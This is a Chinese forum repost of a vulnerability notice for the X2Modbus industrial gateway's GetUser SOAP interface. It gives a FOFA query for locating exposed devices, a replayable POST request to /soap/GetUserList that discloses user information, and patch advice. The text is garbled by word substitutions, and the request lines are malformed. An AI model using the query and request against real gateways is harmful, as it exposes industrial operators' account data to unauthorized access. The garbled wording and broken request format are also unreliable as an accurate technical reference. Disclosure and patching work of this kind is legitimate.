迅饶科技X2Modbus网关-GetUser信息泄露漏洞

打印 上一主题 下一主题

主题 1710|帖子 1710|积分 5130

免责声明:本号提供的网络安全信息仅供参考,不构成专业建议。作者不对任何由于使用本文信息而导致的直接或间接损害承担责任。如涉及侵权,请实时与我联系,我将尽快处理并删除相关内容。
漏洞形貌

该漏洞的存在是由于'GetUser'接口在处理SOAP哀求时,缺乏对哀求的充分验证和授权检查,任何人都可以通过发送特定的SOAP哀求,获取体系中存在的用户信息,攻击者可以通过发送包含合法用户凭据的SOAP哀求,绕过身份验证机制,直接获取用户数据。
漏洞再现

FOFA:server="SunFull-Webs"
在http://ip:898/login.html页面抓包,在重放器使用下面的格式
   POST /soap/GetUserList
  HTTP/1.1 ip
  Cookie: language=zh-cn; language=zh-cn; username=admin
  Content-Length: 12
  Connection: close
   
  {"CmpWc":""}
  

 修复建议

对 GetUser 接口的输入举行严格的验证和过滤。确保输入的用户名和暗码符合预期的格式和长度,防止恶意用户通过构造特别字符或语句来获取信息。
定期检查迅饶科技官方网站或相关渠道,获取 X2Modbus 网关的最新安全补丁,并实时应用到体系中。厂商通常会修复已知的漏洞,通过更新补丁可以有用地防止攻击者使用这些漏洞举行信息泄露攻击。
 

免责声明:如果侵犯了您的权益,请联系站长,我们会及时删除侵权内容,谢谢合作!更多信息从访问主页:qidao123.com:ToB企服之家,中国第一个企服评测及商务社交产业平台。

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有账号?立即注册

x
回复

使用道具 举报

0 个回复

倒序浏览

快速回复

您需要登录后才可以回帖 登录 or 立即注册

本版积分规则

种地

论坛元老
这个人很懒什么都没写!
快速回复 返回顶部 返回列表